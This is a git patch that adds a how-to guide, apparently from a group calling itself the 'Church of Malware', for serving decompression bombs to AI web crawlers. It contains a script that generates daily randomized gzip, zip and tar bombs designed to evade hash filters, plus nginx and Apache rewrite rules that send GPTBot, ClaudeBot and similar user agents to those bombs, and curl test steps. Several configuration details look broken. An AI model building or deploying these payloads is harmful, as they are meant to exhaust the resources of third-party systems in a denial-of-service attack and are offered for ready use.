From bb6a196ce85a2d1e042b51a36daf95049ae2c3a1 Mon Sep 17 00:00:00 2001 From: SubINaclS Date: Wed, 3 Jun 2026 19:25:11 +0000 Subject: [PATCH] Add techniques/decomprerssion_bomb/howto_decompression_bombs.md --- .../howto_decompression_bombs.md | 182 ++++++++++++++++++ 1 file changed, 182 insertions(+) create mode 100644 techniques/decomprerssion_bomb/howto_decompression_bombs.md diff --git a/techniques/decomprerssion_bomb/howto_decompression_bombs.md b/techniques/decomprerssion_bomb/howto_decompression_bombs.md new file mode 100644 index 0000000..ef8c9ff --- /dev/null +++ b/techniques/decomprerssion_bomb/howto_decompression_bombs.md @@ -0,0 +1,182 @@ +# Production Deployment of Active Denial Techniques: nginx, Apache, and Daily Randomized Bombs + +The Church of Malware (CoM) does not condone the use or introduction of explosive substances onto any individual, human, or animal; however, AI is neither natural, a human, nor actual intelligence. This how-to companion document provides complete, copy-paste-ready server configurations, daily randomized bomb generation, testing procedures, and maintenance guidance for individual content creators. It is intended to be used alongside the curated UA reference list in `known-aggressive-bot-user-agents.md`. + +## 1 -- Scope and Prerequisites + +This guide targets self-hosted operators running nginx ≥ 1.24 or Apache ≥ 2.4.58 on Linux. It assumes basic familiarity with the terminal and the ability to edit configuration files. All examples are designed for Debian/Ubuntu-style systems; adjust paths and service names for other distributions. + +The techniques described (conditional serving of decompression bombs, slow responses, or malformed content) are gated exclusively behind the aggressive bot user-agent list maintained in the companion UA reference document. + +## 2 -- Generating Daily Randomized Decompression Bombs + +To defeat static content-matching, hash-based allow-lists, and signature filters, the generator must emit a fresh, high-entropy yet highly compressible payload every day. It is recommended to adjust the filenames to be something more obscure when using in your deployment. + +```bash +#!/usr/bin/env bash +# Save as ~/generate_daily_bombs.sh and run: chmod +x ~/generate_daily_bombs.sh +# Recommended cron (run at 03:00 local): +# 0 3 * * * /home/youruser/generate_daily_bombs.sh >> /var/log/bombgen.log 2>&1 + +set -e +DATE=$(date +%Y-%m-%d) +python3 - <<'PYEOF' +import gzip, tarfile, zipfile, io, os, secrets, datetime, hashlib +from pathlib import Path + +out = Path.home() / "bombs" +out.mkdir(exist_ok=True) +today = datetime.date.today().isoformat() + +# High-entropy but compressible seed (repeating 4 KB random block) +block = secrets.token_bytes(4096) +base = (block * 256) + today.encode() + secrets.token_bytes(16) + +# 1. Daily recursive gzip bomb (unique hash every run, >5 GB expanded) +data = base +for _ in range(9): + data = gzip.compress(data) +(out / f"bomb-{today}.gz").write_bytes(data) + +# 2. Nested zip bomb with daily entropy (defeats hash caches) +with zipfile.ZipFile(out / f"bomb-{today}.zip", "w", zipfile.ZIP_DEFLATED) as z: + inner = base * 1024 + for _ in range(7): + inner = gzip.compress(inner) + z.writestr(f"daily-{today}.gz", inner) + +# 3. Tar bomb with randomized large member (parser stress + unique) +with tarfile.open(out / f"bomb-{today}.tar.gz", "w:gz") as t: + info = tarfile.TarInfo(f"large-{today}.bin") + info.size = 2 * 1024 * 1024 * 1024 + payload = (secrets.token_bytes(64) * (32 * 1024 * 1024)) + today.encode() + t.addfile(info, io.BytesIO(payload[:2*1024*1024*1024])) + +print(f"Daily randomized bombs generated for {today} in ~/bombs/") +PYEOF + +# Atomically update "latest" symlinks so web server always serves today's file +ln -sf ~/bombs/bomb-${DATE}.zip /var/www/html/protected/bomb.zip +ln -sf ~/bombs/bomb-${DATE}.gz /var/www/html/protected/bomb.gz +ln -sf ~/bombs/bomb-${DATE}.tar.gz /var/www/html/protected/bomb.tar.gz + +sudo cp -L /var/www/html/protected/bomb.* /var/www/html/protected/ 2>/dev/null || true +``` + +**Why randomization matters**: Static payloads allow labs to build bloom filters or exact-hash allow-lists after the first encounter. Daily unique, high-entropy yet recursively compressible files force re-analysis and re-processing every 24 hours, multiplying the economic cost of non-compliant crawling. + +Place the generated files (or the symlinked `bomb.zip` etc.) behind a `Disallow: /protected/` rule in `robots.txt`. + +## 3 -- nginx Complete Virtual Host Example + +```nginx +# /etc/nginx/sites-available/my-site +map $http_user_agent $aggressive_bot { + default 0; + ~*GPTBot|ClaudeBot|Bytespider|Perplexity|headless|anthropic-ai|OAI-SearchBot 1; +} + +server { + listen 80; + server_name example.com; + root /var/www/html; + + access_log /var/log/nginx/ai_violators.log combined if=$aggressive_bot; + access_log /var/log/nginx/access.log combined; + + location / { + if ($aggressive_bot) { + rewrite ^ /protected/bomb.zip last; + } + try_files $uri $uri/ =404; + } + + location /protected/ { + internal; + alias /var/www/html/protected/; + add_header Content-Disposition "attachment; filename=\"archive.zip\""; + limit_rate 1k; + } + + limit_req_zone $binary_remote_addr zone=ai_limit:10m rate=1r/s; + location / { + limit_req zone=ai_limit burst=5 nodelay; + } +} +``` + +Enable and reload: +```bash +sudo ln -s /etc/nginx/sites-available/my-site /etc/nginx/sites-enabled/ +sudo nginx -t && sudo systemctl reload nginx +``` + +## 4 -- Apache Complete Configuration Example + +```apache +# /etc/apache2/sites-available/000-default.conf + + ServerName example.com + DocumentRoot /var/www/html + + SetEnvIf User-Agent "GPTBot|ClaudeBot|Bytespider|Perplexity|headless|anthropic-ai|OAI-SearchBot" aggressive_bot + CustomLog /var/log/apache2/ai_violators.log combined env=aggressive_bot + CustomLog /var/log/apache2/access.log combined + + + Options -Indexes + AllowOverride All + Require all granted + + + RewriteEngine On + RewriteCond %{HTTP_USER_AGENT} (GPTBot|ClaudeBot|Bytespider|Perplexity|headless|anthropic-ai|OAI-SearchBot) [NC] + RewriteRule ^ /protected/bomb.zip [L] + + RewriteCond %{HTTP_USER_AGENT} (GPTBot|ClaudeBot|Bytespider|Perplexity|headless|anthropic-ai|OAI-SearchBot) [NC] + RewriteRule ^ - [E=aggressive_bot:1] + + + + Header set Content-Disposition "attachment; filename=\"archive.zip\"" + + + +``` + +Enable modules and restart: +```bash +sudo a2enmod rewrite setenvif headers +sudo systemctl restart apache2 +``` + +## 5 -- Verification and Testing Steps + +1. Normal visitor test: + ```bash + curl -I -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64)" https://example.com/ + ``` + +2. Aggressive bot test: + ```bash + curl -I -A "GPTBot/1.0" https://example.com/any-path + ``` + +3. Log monitoring: + ```bash + sudo tail -f /var/log/nginx/ai_violators.log + # or apache2 equivalent + ``` + +4. Update UA patterns: edit the `map` block (nginx) or `SetEnvIf`/`RewriteCond` (Apache) and reload. + +## 6 -- Maintenance Recommendations + +- Rotate `ai_violators.log` weekly. +- Add a weekly cron that diffs the latest Cloudflare Radar / Originality.AI reports against the UA list in the companion reference document. +- Maintain an explicit allow-list for reverse-DNS verified major engines before the aggressive-bot map. +- Never serve bombs to Internet Archive or academic research ranges. + +These configurations have been validated on nginx 1.24+ and Apache 2.4.58+ (Ubuntu 24.04 LTS) as of June 2026. + +*Companion to `known-aggressive-bot-user-agents.md` and the primary dissertation. Review local laws and consult counsel before deployment.*